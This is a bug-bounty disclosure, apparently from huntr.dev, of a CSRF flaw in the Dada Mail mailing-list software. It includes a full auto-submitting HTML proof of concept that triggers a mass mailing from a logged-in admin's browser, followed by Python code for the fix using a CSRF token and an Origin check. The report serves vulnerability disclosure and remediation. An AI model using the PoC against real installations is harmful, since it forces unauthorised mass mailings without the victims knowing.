History: Sep 12, 2021 - 11:23 p.m.

Cross-Site Request Forgery (CSRF) in justingit/dada-mail

2021-09-12 23:23:52
amammad
www.huntr.dev

✍️ Description

An attacker is able to send any mass mailing through a CSRF attack.

In a CSRF attack, a user who is logged into the application only needs to visit a malicious website; a redirection or auto-submitted form from that site then performs the action on the unprotected endpoint. Merely visiting the site causes the unwanted action to be performed, without the user being aware of it.

Alternatively, users with low privileges can send a link to users and admins with higher privileges, and the malicious request is then executed without the victim users or admins being aware of it.

🕵️‍♂️ Proof of Concept

1. First, an admin or a user with the required privileges must already be logged in in any browser.

2. Open PoC.html (it auto-submits).

3. A mass mailing with Preheader aaa and content bbb will be sent once PoC.html is opened.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://dadademo.com/cgi-bin/dada/mail.cgi" method="POST">
      <input type="hidden" name="list" value="demolist" />
      <input type="hidden" name="sched_flavor" value="" />
      <input type="hidden" name="flavor" value="send_email" />
      <input type="hidden" name="support_files_url" value="https://dadademo.com/dada_mail_support_files" />
      <input type="hidden" name="draft_alert" value="0" />
      <input type="hidden" name="draft_id" value="441" />
      <input type="hidden" name="save_draft_role" value="draft" />
      <input type="hidden" name="draft_role" value="draft" />
      <input type="hidden" name="schedule_html_body_checksum" value="" />
      <input type="hidden" name="feed_url_most_recent_entry" value="" />
      <input type="hidden" name="schedule_type" value="single" />
      <input type="hidden" name="schedule_single_displaydatetime" value="" />
      <input type="hidden" name="schedule_recurring_displaydatetime_start" value="" />
      <input type="hidden" name="schedule_recurring_displaydatetime_end" value="" />
      <input type="hidden" name="schedule_recurring_display_hms" value="00:00" />
      <input type="hidden" name="schedule_recurring_days" value="1" />
      <input type="hidden" name="schedule_recurring_days" value="2" />
      <input type="hidden" name="schedule_recurring_days" value="3" />
      <input type="hidden" name="schedule_recurring_days" value="4" />
      <input type="hidden" name="schedule_recurring_days" value="5" />
      <input type="hidden" name="schedule_recurring_days" value="6" />
      <input type="hidden" name="schedule_recurring_days" value="7" />
      <input type="hidden" name="schedule_recurring_only_mass_mail_if_primary_diff" value="1" />
      <input type="hidden" name="Reply-To" value="" />
      <input type="hidden" name="X-Priority" value="3" />
      <input type="hidden" name="Subject" value="<!-- tmpl_var list_settings.list_name --> Message" />
      <input type="hidden" name="X-Preheader" value="aaa" />
      <input type="hidden" name="content_from" value="content_from_textarea" />
      <input type="hidden" name="html_message_body" value="<html>
<head>
	<title></title>
</head>
<body>
<p>aaa</p>
</body>
</html>
" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="crop_html_content_selector_type" value="id" />
      <input type="hidden" name="crop_html_content_selector_label" value="" />
      <input type="hidden" name="feed_url" value="" />
      <input type="hidden" name="feed_url_content_type" value="summary" />
      <input type="hidden" name="feed_url_max_entries" value="5" />
      <input type="hidden" name="feed_url_pre_html" value="" />
      <input type="hidden" name="feed_url_post_html" value="" />
      <input type="hidden" name="text_message_body" value="" />
      <input type="hidden" name="plaintext_url" value="" />
      <input type="hidden" name="plaintext_content_from" value="auto" />
      <input type="hidden" name="rich_filemanager_enabled" value="1" />
      <input type="hidden" name="rich_filemanager_url" value="https://dadademo.com/dada_mail_support_files/RichFilemanager" />
      <input type="hidden" name="rich_filemanager_upload_dir" value="/home8/dadademo/public_html/dada_mail_support_files/file_uploads" />
      <input type="hidden" name="rich_filemanager_upload_url" value="https://dadademo.com/dada_mail_support_files/file_uploads" />
      <input type="hidden" name="SUPPORT_FILES_URL" value="https://dadademo.com/dada_mail_support_files" />
      <input type="hidden" name="attachment1" value="" />
      <input type="hidden" name="attachment2" value="" />
      <input type="hidden" name="attachment3" value="" />
      <input type="hidden" name="attachment4" value="" />
      <input type="hidden" name="attachment5" value="" />
      <input type="hidden" name="layout" value="default" />
      <input type="hidden" name="local_archive_options_present" value="1" />
      <input type="hidden" name="archive_message" value="1" />
      <input type="hidden" name="backdate_datetime" value="2021-09-12 22:37:41" />
      <input type="hidden" name="email.operator" value="LIKE" />
      <input type="hidden" name="email.value" value="" />
      <input type="hidden" name="subscriber.timestamp.rangestart" value="" />
      <input type="hidden" name="subscriber.timestamp.rangeend" value="" />
      <input type="hidden" name="mass_mailing_utm_domains" value="" />
      <input type="hidden" name="mass_mailing_utm_source" value="Pro Dada" />
      <input type="hidden" name="mass_mailing_utm_medium" value="email" />
      <input type="hidden" name="mass_mailing_utm_term" value="" />
      <input type="hidden" name="mass_mailing_utm_content" value="" />
      <input type="hidden" name="mass_mailing_utm_name" value="" />
      <input type="hidden" name="test_recipient_type" value="from_textbox" />
      <input type="hidden" name="test_recipients" value="" />
      <input type="hidden" name="process" value="save_as_draft" />
      <input type="hidden" name="json" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

This PoC can perform the attack without the user noticing. The PoC can also send multiple requests at the same time, which means an attacker can brute-force all possible actions (using multiple iframes).

💥 Impact

This vulnerability is capable of causing medium damage to the availability and integrity of the system.

Fix

You should set a CSRF token for each user/form and validate it on submission.
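A server-side check of the kind the fix describes, written here as an added example in generic Python (it is not Dada Mail's own Perl code). It implements the synchronizer-token pattern: a per-session token is minted at login, emitted as a hidden field in the server-rendered form, and compared in constant time on every POST; an Origin check is added as defence in depth. The in-memory session store, the csrf_token field name and the handle_post/render_send_form helpers are assumptions for the illustration; the flavor=send_email and /cgi-bin/dada/mail.cgi values are taken from the PoC above.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed in-memory session store: session id -> per-session CSRF token.
# (Illustrative; a real application would keep this in its session backend.)
_sessions = {}


def new_session():
    """Create a logged-in session and mint a fresh, unguessable CSRF token for it."""
    sid = secrets.token_urlsafe(16)
    _sessions[sid] = secrets.token_urlsafe(32)
    return sid


def csrf_token_for(sid):
    """Return the token bound to this session (what the server puts into its forms)."""
    return _sessions[sid]


def render_send_form(sid, action="/cgi-bin/dada/mail.cgi"):
    """Server-rendered send form. The hidden csrf_token field is the piece a
    cross-origin page such as PoC.html cannot read or predict, so it cannot
    build a request that passes handle_post()."""
    token = csrf_token_for(sid)
    return (
        f'<form action="{action}" method="POST">'
        f'<input type="hidden" name="csrf_token" value="{token}" />'
        '<input type="hidden" name="flavor" value="send_email" />'
        "</form>"
    )


def handle_post(sid, body, origin=None, allowed_origins=("https://dadademo.com",)):
    """Validate a mass-mailing POST. Returns (http_status, reason).

    sid     -- session id from the user's cookie
    body    -- raw application/x-www-form-urlencoded request body
    origin  -- value of the Origin request header, if the browser sent one
    """
    if sid not in _sessions:
        return 401, "not logged in"

    # Defence in depth: browsers attach an Origin header to cross-site form
    # POSTs, so a forged submission from another site is rejected here even
    # before the token is examined.
    if origin is not None and origin not in allowed_origins:
        return 403, "origin mismatch"

    params = parse_qs(body, keep_blank_values=True)
    submitted = params.get("csrf_token", [""])[0]
    expected = _sessions[sid]

    # Constant-time comparison on bytes so the check neither leaks the token
    # through timing nor raises on non-ASCII input.
    if not submitted or not hmac.compare_digest(submitted.encode(), expected.encode()):
        return 403, "missing or invalid CSRF token"

    if params.get("flavor", [""])[0] == "send_email":
        return 200, "mass mailing accepted"
    return 400, "unknown action"


def demo():
    """Replay the PoC's shape against the check: the forged body carries the
    PoC's fields but no token, the legitimate body adds the session's token."""
    sid = new_session()
    # Constructed request body modelled on the hidden fields in PoC.html.
    forged = "list=demolist&flavor=send_email&process=save_as_draft&json=1"
    legit = forged + "&csrf_token=" + csrf_token_for(sid)
    return (
        handle_post(sid, forged, origin="https://attacker.example"),  # rejected: origin
        handle_post(sid, forged),                                      # rejected: no token
        handle_post(sid, legit, origin="https://dadademo.com"),        # accepted
    )


if __name__ == "__main__":
    for status, reason in demo():
        print(status, reason)
```

The token must be bound to the session (or to the user and form) rather than being a global constant, and it must be regenerated on login; the Origin check alone is not sufficient because older clients may omit the header, which is why the code treats a missing Origin as "fall through to the token check" rather than as a pass.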